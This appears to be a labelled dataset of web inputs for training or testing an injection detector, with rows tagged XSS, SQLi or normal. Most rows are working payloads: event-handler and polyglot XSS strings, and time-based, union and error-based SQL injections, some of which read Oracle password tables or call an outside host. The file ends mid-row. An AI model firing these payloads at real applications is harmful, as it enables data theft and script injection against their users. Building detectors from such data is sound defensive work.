src=x\x09onerror=""javascript:alert(1)"">",1,XSS,6771 <meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus>,1,XSS,3201 Once you select the hardware handshake option the state of the CTS input to the computer becomes important.,3,normal,25832 "<q onpaste=""alert(1)"" contenteditable>test</q>",1,XSS,6451 <nobr onpointerleave=alert(1)>XSS</nobr>,1,XSS,7954 "1'+ ( select dagm where 5461 = 5461 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) ) +'",2,SQLi,14650 "{""id"":null,""name"":""Indian Rhinoceros""}",3,normal,27249 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#",2,SQLi,15828 "1%"" ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,19052 "<;A HREF="";http://0102.0146.0007.00000223/"";>;XSS<;/A>;",1,XSS,4437 "1 ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11381 1' ) ) ) and 2006 = 2006,2,SQLi,21253 "1"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )",2,SQLi,13692 ") AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),5) AND (1337=1337",2,SQLi,14669 select ( case when ( 4061 = 1396 ) then 4061 else 1/ ( select 0 ) end ) --,2,SQLi,15730 1' ) ) rlike sleep ( 5 ) and ( ( 'qitl' like 'qitl,2,SQLi,18469 "<audio draggable=""true"" ondragleave=""alert(1)"">test</audio>",1,XSS,3777 "-3637"" or ( 8459 = 8459 ) *4906",2,SQLi,20407 "1"" ) as bpmk where 6412 = 6412 union all select null,null,null,null#",2,SQLi,16398 "<span oncut=""alert(1)"" contenteditable>test</span>",1,XSS,5598 "In Bushwick, she will play the chorus on select nights.",3,normal,26018 </title><script>alert(1);</script>,1,XSS,9300 "It Was Proposed By A Committee Of The British Association To Select The Temperature At Which The Specific Heat Was 4.20O Joules, Leaving The Exact Temperature To Be Subsequently Determined.",3,normal,25953 <frameset id=x tabindex=1 onactivate=alert(1)></frameset>,1,XSS,4176 "1"" ) ) order by 1#",2,SQLi,22068 "<? foo=""><script>alert(91)</script>"">",1,XSS,8740 <dt onpointerout=alert(1)>XSS</dt>,1,XSS,9219 or WAITFOR DELAY '0:0:5',2,SQLi,21178 "-2417 ) union all select 2169,2169,2169,2169,2169,2169,2169,2169,2169,2169#",2,SQLi,15605 "1"" ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( ""kfdh"" like ""kfdh",2,SQLi,10167 "{""id"":null,""firstName"":""Corinne"",""lastName"":""Chua"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27100 <img/src='x'onerror=alert(1)>//INJECTX,1,XSS,8546 "<div draggable=""true"" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex>",1,XSS,985 "<dir oncontextmenu=""alert(1)"">test</dir>",1,XSS,8036 "<s onbeforecopy=""alert(1)"" contenteditable>test</s>",1,XSS,5482 "1'|| ( select 'rqzu' from dual where 9516 = 9516 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14918 -1908' ) ) ) union all select 7665#,2,SQLi,20070 "1' in boolean mode ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) #",2,SQLi,10510 "&lt;XSS STYLE=\""xss&#58;expression(alert('XSS'))\""&gt;",1,XSS,4659 <sup id=x tabindex=1 onfocusin=alert(1)></sup>,1,XSS,6416 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) # lchh",2,SQLi,15410 <link onblur=alert(1) tabindex=1 id=x></link><input autofocus>,1,XSS,3152 admin') or '1'='1'/*,2,SQLi,21717 "1%"" ) ) ) and 1594 = 8757",2,SQLi,21140 "1%"" ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,15885 <svg><slot onload=alert(1)></slot>,1,XSS,9268 "<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("""")>",1,XSS,5971 "select * from users where id = 1 or 1#""; union select version ( ) ,version ( ) -- 1",2,SQLi,15022 "1%"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ""%"" = """,2,SQLi,11915 "1 ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,19347 "select * from users where id = 1. union select version ( ) ,version ( ) -- 1",2,SQLi,15478 select * from users where id = 1 + ( $+ ) or 1 = 1 -- 1,2,SQLi,17748 "{""id"":null,""firstName"":""Adeline"",""lastName"":""Tay"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26901 "<div draggable=""true"" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl>",1,XSS,1393 Users manage their accounts and select vehicles through an app.,3,normal,25197 <rp id=x tabindex=1 onfocus=alert(1)></rp>,1,XSS,7440 -2055 ) or 3038 = 3038,2,SQLi,21540 <ul onpointerleave=alert(1)>XSS</ul>,1,XSS,8805 Where's your SQL reference?,3,normal,23409 "<style>@keyframes slidein {}</style><table style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></table>",1,XSS,373 <fieldset onpointerover=alert(1)>XSS</fieldset>,1,XSS,6148 admin') or ('1'='1,2,SQLi,22023 <embed src=//14.rs>,1,XSS,9778 "1"" and make_set ( 8403 = 8403,8899 ) and ""bbgg"" = ""bbgg",2,SQLi,17820 -2820' ) ) or 6679 = 8848--,2,SQLi,20912 ||utl_http.request ( 'httP://192.168.1.1/' ) ||',2,SQLi,18664 Select car.,3,normal,24710 "<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:javascript:alert(1);"">",1,XSS,2214 "<var onpaste=""alert(1)"" contenteditable>test</var>",1,XSS,5605 <input autofocus onfocusin=alert(1)>,1,XSS,8884 "<slot oncopy=""alert(1)"" contenteditable>test</slot>",1,XSS,5419 "<br draggable=""true"" ondragstart=""alert(1)"">test</br>",1,XSS,4940 "1"" ) ) and 9660 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,13458 "1"" union all select null,null,null#",2,SQLi,20032 "<footer onbeforepaste=""alert(1)"" contenteditable>test</footer>",1,XSS,3160 "-eval(window['pro'%2B'mpt'](8)"")-""",1,XSS,9161 "<style>@keyframes slidein {}</style><a style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></a>",1,XSS,465 "-3794' ) union all select 2485,2485,2485,2485,2485--",2,SQLi,18162 1' ) where 2808 = 2808,2,SQLi,21505 "<style>:target {transform: rotate(180deg);}</style><frame id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></frame>",1,XSS,617 "<details onmousemove=""alert(1)"">test</details>",1,XSS,6382 "UNION ALL SELECT 1,2,3,4,5,6,7--",2,SQLi,20237 "1%' ) union all select null,null,null,null,null,null,null,null--",2,SQLi,16786 "AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i",2,SQLi,11322 ( select ( case when ( 9337 = 9337 ) then waitfor delay '0:0:5' else 9337* ( select 9337 from master..sysdatabases ) end ) ),2,SQLi,13019 <table onpointerup=alert(1)>XSS</table>,1,XSS,8184 ",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,17743 "-7078'|| ( select 'lcza' where 5076 = 5076 union all select 5076,5076,5076,5076,5076,5076,5076,5076,5076,5076--",2,SQLi,13535 "-4465%' union all select 6196,6196,6196,6196,6196,6196,6196,6196--",2,SQLi,16598 <style><!--</style><script>document.vulnerable=true;//--></script>,1,XSS,2718 1 where 5080 = 5080,2,SQLi,21960 ;sleep(5)--,2,SQLi,22396 Y.) Permanent Select Committee on IntelligenceChairman Devin Nunes (Calif.)Rep.,3,normal,25113 "-3672"" ) ) union all select 6093#",2,SQLi,20205 -4325 order by 1--,2,SQLi,22070 1 where 5161 = 5161 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,10027 "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( 'fnon' like 'fnon",2,SQLi,13663 "1"" ) and sleep ( 5 ) #",2,SQLi,21506 "<content onclick=""alert(1)"">test</content>",1,XSS,7392 1' ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,18302 AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i,2,SQLi,14380 "Additionally, the adjustable roller hinges allow you to select the aggressiveness of rotation.",3,normal,26409 <label onpointerover=alert(1)>XSS</label>,1,XSS,7772 "<details onmouseleave=""alert(1)"">test</details>",1,XSS,6223 Where's the data stored?,3,normal,23381 "Whether you choose to spend a fortune on dishes or you decide to select a more economical dinnerware choice, this could be the start of a holiday tradition.",3,normal,25141 "<div id=""136""><form action="""" method=""post"">",1,XSS,7040 "1'+ ( select 'gqsk' where 3087 = 3087 union all select null,null,null,null--",2,SQLi,15498 "1' ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'wcmt' = 'wcmt",2,SQLi,11670 )) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AND (('1337' LIKE '1337,2,SQLi,15921 "1"" ) where 8095 = 8095 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --",2,SQLi,10594 "1"" ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( ""nepk"" = ""nepk",2,SQLi,15535 "West Elm: Up to 25% off select furniture, and 25% off select rugs, curtains, bedding, lighting, pillows, décor, wall art and mirrors.",3,normal,25172 "end and ( ""qkkn"" like ""qkkn",2,SQLi,20872 "-2321%"" ) or 2271 = 7683--",2,SQLi,21008 "<listing onmouseover=""alert(1)"">test</listing>",1,XSS,6360 Where's the perfect spot to relax and unwind?,3,normal,23683 or 'whatever' in ( 'whatever' ),2,SQLi,20401 "<spacer onmouseleave=""alert(1)"">test</spacer>",1,XSS,6694 Select a recipe for a special meal.,3,normal,24056 "select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 'xcxr' like 'xcxr",2,SQLi,15905 "<style>:target {color:red;}</style><legend id=x style=""transition:color 1s"" ontransitionend=alert(1)></legend>",1,XSS,1032 "<<SCRIPT>alert(""XSS"");//<</SCRIPT>",1,XSS,9167 1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,18628 <embed src=%(jscript)s></embed>,1,XSS,9491 "<div id=""88""><svg xmlns=""http://www.w3.org/2000/svg"" xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,1579 "-8040"" ) ) ) or make_set ( 3916 = 6787,6787 ) and ( ( ( ""laar"" like ""laar",2,SQLi,15883 1 ) ) as xoch where 8765 = 8765 and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) --,2,SQLi,9971 "<image src=1 href=1 onerror=""javascript:alert(1)""></image>",1,XSS,3795 Where is the SQL server?,3,normal,23454 "select * from users where id = 1 or "" ( {"" or 1 = 1 -- 1",2,SQLi,17575 Select a card.,3,normal,24800 "<optgroup onbeforecut=""alert(1)"" contenteditable>test</optgroup>",1,XSS,2919 "<nobr oncut=""alert(1)"" contenteditable>test</nobr>",1,XSS,5588 "1"" ) where 4822 = 4822 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14629 <body id=x tabindex=1 onfocus=alert(1)></body>,1,XSS,6328 Where's the restaurant?,3,normal,23492 "<style>@keyframes x{}</style><title style=""animation-name:x"" onanimationstart=""alert(1)""></title>",1,XSS,1517 <col id=x tabindex=1 onbeforedeactivate=alert(1)></col><input autofocus>,1,XSS,2373 <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN,1,XSS,3434 "-9135"" ) ) or 6872 = 6872 and ( ( ""fllx"" = ""fllx",2,SQLi,18671 "<marquee oncut=""alert(1)"" contenteditable>test</marquee>",1,XSS,4241 "))) RLIKE SLEEP(5) AND (((1337""=""1337",2,SQLi,19797 "<div draggable=""true"" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li>",1,XSS,1392 "<div draggable=""true"" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid>",1,XSS,895 "select * from users where id = 1 or "".["" or 1 = 1 -- 1",2,SQLi,17898 Select decline.,3,normal,24583 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#",2,SQLi,14061 1 where 7055 = 7055,2,SQLi,22016 "-3017"" ) ) as ljit where 9128 = 9128 union all select 9128,9128,9128,9128,9128--",2,SQLi,15211 "<fieldset onbeforecut=""alert(1)"" contenteditable>test</fieldset>",1,XSS,2935 "Select the Sharing tab, then under ' Local sharing and security ' check the box ' make this folder private ' .",3,normal,25585 "1' ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'mymg' = 'mymg",2,SQLi,10961 "When in a store buying fabric, select your fabric and place it in a shopping cart.",3,normal,25161 "Click ""Select all,"" and then click the icon again and select ""Export vCard…""",3,normal,26285 "<style>:target {color:red;}</style><image id=x style=""transition:color 1s"" ontransitionend=alert(1)></image>",1,XSS,1131 "<style>:target {transform: rotate(180deg);}</style><q id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></q>",1,XSS,733 "1' ) and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ( 'ndhn' like 'ndhn",2,SQLi,11134 "<optgroup onkeypress=""alert(1)"" contenteditable>test</optgroup>",1,XSS,3086 <button onBeforeUpdate=javascript:alert(1)>,1,XSS,7300 "<big draggable=""true"" ondragenter=""alert(1)"">test</big>",1,XSS,4590 "1"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ""nkgd"" = ""nkgd",2,SQLi,12520 "<datalist draggable=""true"" ondragleave=""alert(1)"">test</datalist>",1,XSS,2797 "><img src=x onerror=javascript:alert(A"")>",1,XSS,7604 "<iframe src=""http://example.com/"" style=""width:800px; height:350px; border:none; mask: url(#maskForClickjacking);""/>",1,XSS,800 "-5575"" union all select 8665,8665,8665,8665,8665,8665,8665--",2,SQLi,17142 -3496' ) ) or 9323 = 9323#,2,SQLi,20970 "SLEEP(1)/*' or SLEEP(1) or '"" or SLEEP(1) or ""*/",2,SQLi,18652 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></applet>",1,XSS,180 "1 ) where 9432 = 9432 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11493 "select * from users where id = 1 or "" ) ,"" or 1 = 1 -- 1",2,SQLi,17582 "1'+ ( select 'bztp' where 2541 = 2541 union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,13822 <x%0Aonxxx=1,1,XSS,9833 "1' union all select null,null,null,null,null,null,null,null#",2,SQLi,17198 Select from the list of available skins the one you wish to use.,3,normal,25631 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></thead>",1,XSS,200 "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--",2,SQLi,14667 "1%' ) ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,16956 1'|| ( select 'sxya' where 3578 = 3578,2,SQLi,19747 "1%' ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( '%' = '",2,SQLi,12964 "-6478"" ) ) union all select 7087,7087,7087,7087,7087,7087,7087,7087--",2,SQLi,16292 "1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )",2,SQLi,11796 Won: Best Foreign Film Available: to watch in select theaters.,3,normal,25114 Order pizza tonight.,3,normal,22776 ( select * from ( select ( sleep ( 5 ) ) ) srmq ) -- mmjk,2,SQLi,17548 "1"" and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ""kfps"" = ""kfps",2,SQLi,13301 Select your chat.,3,normal,24910 1 ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and ( ( 1476 = 1476,2,SQLi,15127 "<noembed onclick=""alert(1)"">test</noembed>",1,XSS,7536 "-6158"" ) ) ) or 8571 = 8571--",2,SQLi,20747 "-1844"" ) ) ) or make_set ( 9354 = 9354,7185 ) and ( ( ( ""abdw"" like ""abdw",2,SQLi,15879 <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#,1,XSS,68 "<embed onpaste=""alert(1)"" contenteditable>test</embed>",1,XSS,4714 "1' ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'ppwh' = 'ppwh",2,SQLi,11476 "1' and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,15713 Select double-check.,3,normal,24573 "<img draggable=""true"" ondragend=""alert(1)"">test</img>",1,XSS,5035 <figure onpointerenter=alert(1)>XSS</figure>,1,XSS,6918 <dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus>,1,XSS,2574 Join the cycling club.,3,normal,22691 "1"" ) ) as bbkl where 5686 = 5686",2,SQLi,20249 "-6593"" ) union all select 6216,6216,6216,6216,6216,6216,6216#",2,SQLi,17030 Select your proposal.,3,normal,24949 "<content onmouseenter=""alert(1)"">test</content>",1,XSS,6224 "<div draggable=""true"" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont>",1,XSS,789 "<object draggable=""true"" ondragstart=""alert(1)"">test</object>",1,XSS,3334 "{""id"":null,""name"":""tail""}",3,normal,27113 "<hr onkeyup=""alert(1)"" contenteditable>test</hr>",1,XSS,6010 <meta onpointerout=alert(1)>XSS</meta>,1,XSS,8337 "-9574%' ) ) union all select 5645,5645,5645,5645,5645,5645,5645--",2,SQLi,16679 "{""id"":null,""firstName"":""Gotk"",""lastName"":""Han Jian"",""address"":""735 Crawford Dr"",""city"":""623"",""telephone"":""6418384363""}",3,normal,27620 "1' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,13472 Select finish.,3,normal,24588 "<div draggable=""true"" contenteditable>drag me</div><sup ondragover=alert(1) contenteditable>drop here</sup>",1,XSS,1193 "1' ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'lmoh' like 'lmoh",2,SQLi,12502 "javascript:`//""//\""//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`",1,XSS,517 "-4756"" ) ) union all select 6846,6846,6846,6846,6846,6846,6846#",2,SQLi,16886 "<head draggable=""true"" ondragend=""alert(1)"">test</head>",1,XSS,4478 "1 ) as tkkn where 7832 = 7832 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) --",2,SQLi,10256 "{""id"":null,""firstName"":"""",""lastName"":"""",""address"":"""",""city"":"""",""telephone"":""""}",3,normal,26782 "-9379 ) or make_set ( 9354 = 9354,7185 ) and ( 9212 = 9212",2,SQLi,17441 1 ) where 7096 = 7096,2,SQLi,21621 "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ""unju"" = ""unju",2,SQLi,14646 "-4571' union all select 3227,3227,3227,3227--",2,SQLi,19006 "select * from users where id = 1 or ""?%"" or 1 = 1 -- 1",2,SQLi,17922 "<frameset ondblclick=""alert(1)"">test</frameset>",1,XSS,6193 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#",2,SQLi,14199 <input2 onpointermove=alert(1)>XSS</input2>,1,XSS,7240 <abbr id=x tabindex=1 onactivate=alert(1)></abbr>,1,XSS,5755 "<body onResize body onResize=""javascript:javascript:alert(1)""></body onResize>",1,XSS,2070 The guards force the inmates to select a shawish (leader) or select one themselves.,3,normal,25439 <frame onpointerup=alert(1)>XSS</frame>,1,XSS,8239 "1'+ ( select vlut where 9517 = 9517 union all select null,null,null--",2,SQLi,16276 "select * from users where id = 1 or 1#""{ union select 1,version ( ) -- 1",2,SQLi,15929 "<style>@keyframes x{}</style><select style=""animation-name:x"" onanimationstart=""alert(1)""></select>",1,XSS,1464 "-2798'+ ( select 'emui' where 9565 = 9565 union all select 9565,9565,9565,9565--",2,SQLi,15231 "1"" ) ) ) union all select null,null,null,null,null#",2,SQLi,18279 "<map onbeforecopy=""alert(1)"" contenteditable>test</map>",1,XSS,4578 &#000060,1,XSS,9859 0 or 1=1,2,SQLi,22497 "<nextid onmouseup=""alert(1)"">test</nextid>",1,XSS,7352 <isindex id=x tabindex=1 onfocusin=alert(1)></isindex>,1,XSS,4820 1' ) where 2852 = 2852,2,SQLi,21448 "javascript:alert()//'//""//\""; '/`/*\/*'/*""/**/(alert())//</style></template/</title/</textarea/</noscript/</noembed/</script>--><frame <svg onload=alert()><script>alert()</script>",1,XSS,222 "1"" ) where 6255 = 6255 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12656 "1"" and make_set ( 8403 = 8403,8899 )",2,SQLi,19961 -9660 ) ) or 9762 = 9698,2,SQLi,21255 "1 ) union all select null,null,null,null,null--",2,SQLi,18884 "<body onbeforecut=""alert(1)"" contenteditable>test</body>",1,XSS,4250 "1 union all select null,null,null,null,null,null--",2,SQLi,18456 select * from users where id = '1' or \.<\ or 1 = 1 -- 1',2,SQLi,17466 "<strong oncontextmenu=""alert(1)"">test</strong>",1,XSS,6489 "<div id=""117""><a href=""http://attacker.org"">",1,XSS,7039 <i onpointerout=alert(1)>XSS</i>,1,XSS,9459 "1 ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 9802 = 9802",2,SQLi,12457 <applet id=x tabindex=1 onfocus=alert(1)></applet>,1,XSS,5652 "-1663' or elt ( 1032 = 1032,3623 ) and 'yqaj' like 'yqaj",2,SQLi,17656 Show me where it's saved.,3,normal,23316 "Click ""Select all,"" and then click the icon again to select ""Print.""",3,normal,26284 -5500' ) order by 1--,2,SQLi,21634 <rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus>,1,XSS,2883 "1%"" ) and make_set ( 8403 = 8403,8899 ) and ( ""%"" = """,2,SQLi,18085 "1"" ) ) ) or sleep ( 5 ) #",2,SQLi,21148 "<style>:target {color: red;}</style><tfoot id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></tfoot>",1,XSS,903 1 ) as zzip where 5353 = 5353 and 3394 = 3092,2,SQLi,19005 "<applet onmouseout=""alert(1)"">test</applet>",1,XSS,7167 1'|| ( select 'eyiy' from dual where 8127 = 8127,2,SQLi,18704 "1' ) as yhgk where 9246 = 9246 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,11618 <label id=x tabindex=1 onbeforedeactivate=alert(1)></label><input autofocus>,1,XSS,2183 <svg><nextid onload=alert(1)></nextid>,1,XSS,8491 javascript:alert%281%29;,1,XSS,9716 1'+ ( select yjtm where 3965 = 3965 and 9389 = 3443,2,SQLi,18393 "<img onmouseleave=""alert(1)"">test</img>",1,XSS,8222 "Once you are there, select the Device Performance & Health icon.",3,normal,25836 Where's the arboretum?,3,normal,23598 "<img src=x\x13onerror=""javascript:alert(1)"">",1,XSS,6775 "On iOS, open Settings, scroll down to Privacy, select Location Services, scroll down to Grindr, and select Never.",3,normal,25852 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5# pdyo",2,SQLi,14460 "1'|| ( select 'gtri' from dual where 7097 = 7097 and elt ( 1210 = 1210,sleep ( 5 ) ) ) ||'",2,SQLi,14702 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( column_name ) FROM ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns ) WHERE LIMIT = 3 ) ) AND 'i' = 'i",2,SQLi,11464 1 where 8532 = 8532,2,SQLi,22015 "1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( ( ( 'zxon' like 'zxon",2,SQLi,16196 Select your ideal date.,3,normal,24435 <content onpointerup=alert(1)>XSS</content>,1,XSS,7260 "<blockquote draggable=""true"" ondragleave=""alert(1)"">test</blockquote>",1,XSS,2582 <body onpointerleave=alert(1)>XSS</body>,1,XSS,7969 I'll select my dress.,3,normal,24347 "<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>",1,XSS,2158 "<dialog onpaste=""alert(1)"" contenteditable>test</dialog>",1,XSS,4342 "<b onclick=""alert(1)"">test</b>",1,XSS,9565 "{""id"":null,""firstName"":""Annabelle"",""lastName"":""Lee"",""address"":""2 College Ave West, Stephen Riady Centre, Singapore 138607"",""city"":""378"",""telephone"":""2685918959""}",3,normal,27427 %20'sleep%2050',2,SQLi,22154 "1%"" and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13767 "<style>:target {color: red;}</style><nav id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></nav>",1,XSS,1075 "-2316%' union all select 8636,8636,8636,8636,8636,8636,8636--",2,SQLi,17089 "<head onkeypress=""alert(1)"" contenteditable>test</head>",1,XSS,4532 "<listing onbeforecut=""alert(1)"" contenteditable>test</listing>",1,XSS,3161 Where's the data located?,3,normal,23390 "<IMG SRC=x onmousewheel=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2989 "<body onPopState body onPopState=""javascript:javascript:alert(1)""></body onPopState>",1,XSS,1884 "-7350' ) ) ) union all select 9207,9207,9207,9207--",2,SQLi,18348 1'|| ( select 'znba' where 8323 = 8323,2,SQLi,19704 ",(select * from (select(sleep(5)))a)",2,SQLi,19942 "<menuitem onmousedown=""alert(1)"">test</menuitem>",1,XSS,5976 "<video onbeforecopy=""alert(1)"" contenteditable>test</video>",1,XSS,3731 "<script>Object.prototype.ALLOWED_ATTR = ['onerror', 